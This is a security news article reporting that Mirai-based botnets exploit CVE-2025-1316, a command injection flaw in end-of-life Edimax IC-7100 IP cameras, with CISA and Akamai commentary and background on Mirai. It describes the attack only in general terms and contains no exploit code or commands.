Critical Zero-Day Flaw in Edimax IP Cameras Exploited by Mirai-Based Botnets
Mirai-based botnets are exploiting a zero-day flaw in Edimax IP cameras for remote command execution. US CISA warns of the vulnerability, urging organizations to report suspicious activity. Learn more about the impact and mitigation strategies.
TL;DR
Mirai-based botnets are exploiting a zero-day flaw (CVE-2025-1316) in Edimax IP cameras to achieve remote command execution. The US CISA has issued a warning about this critical vulnerability, urging organizations to report any suspicious activity. The flaw, which affects all versions of Edimax IC-7100 IP cameras, allows attackers to execute remote commands by sending specially crafted requests.
Critical Zero-Day Flaw in Edimax IP Cameras Exploited by Mirai-Based Botnets
Mirai-based botnets are actively exploiting a zero-day vulnerability in Edimax IP cameras to achieve remote command execution. This critical flaw, tracked as CVE-2025-1316, has a CVSS score of 9.8 and affects all versions of Edimax IC-7100 IP cameras. The US Cybersecurity and Infrastructure Security Agency (CISA) has issued a warning about this vulnerability, urging organizations to report any suspected malicious activity.
Understanding the Vulnerability
The issue stems from an Improper Neutralization of Special Elements used in an OS Command, commonly known as OS Command Injection. Edimax IC-7100 IP cameras fail to properly sanitize requests, allowing attackers to create specially crafted requests to achieve remote code execution on the device. According to the advisory published by CISA:
“Successful exploitation of this vulnerability could allow an attacker to send specially crafted requests to achieve remote code execution on the device. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.”
Impact and Mitigation
The flaw impacts all versions of Edimax IC-7100 IP cameras, which are end-of-life products. This means that the vendor has not addressed the vulnerability, leaving these devices exposed to potential attacks. Although the advisory does not confirm exploitation of the flaw in the wild, CISA urges organizations to report any suspected malicious activity for tracking and correlation.
Discovery and Exploitation
Akamai researchers discovered the vulnerability and confirmed that it is being actively exploited in the wild. Multiple Mirai-based botnets are currently exploiting this and other flaws in Edimax IC-7100 IP cameras. Threat actors use remote command execution to run a shell script that downloads a Mirai malware payload from a remote server. Despite being notified in October 2024, the vendor has been unresponsive to both CISA and Akamai. Akamai warns that the vulnerability may affect supported devices as well.
About Mirai Botnets
Mirai is a type of malware that turns networked devices running Linux into remotely controlled bots, which can be used as part of a botnet in large-scale network attacks. It primarily targets online consumer devices such as IP cameras and home routers. The Mirai botnet was first discovered in August 2016 and has since been used in some of the largest and most disruptive distributed denial of service (DDoS) attacks.
Additional Resources
For further insights, check:
- Security Affairs Article
- CISA Advisory
- Security Week Article
- Bleeping Computer Article Follow me on: - [Twitter](https://twitter.com/securityaffairs) - [Facebook](https://www.facebook.com/sec.affairs) - [Mastodon](https://infosec.exchange/@securityaffairs) Pierluigi Paganini (SecurityAffairs – hacking, US CISA)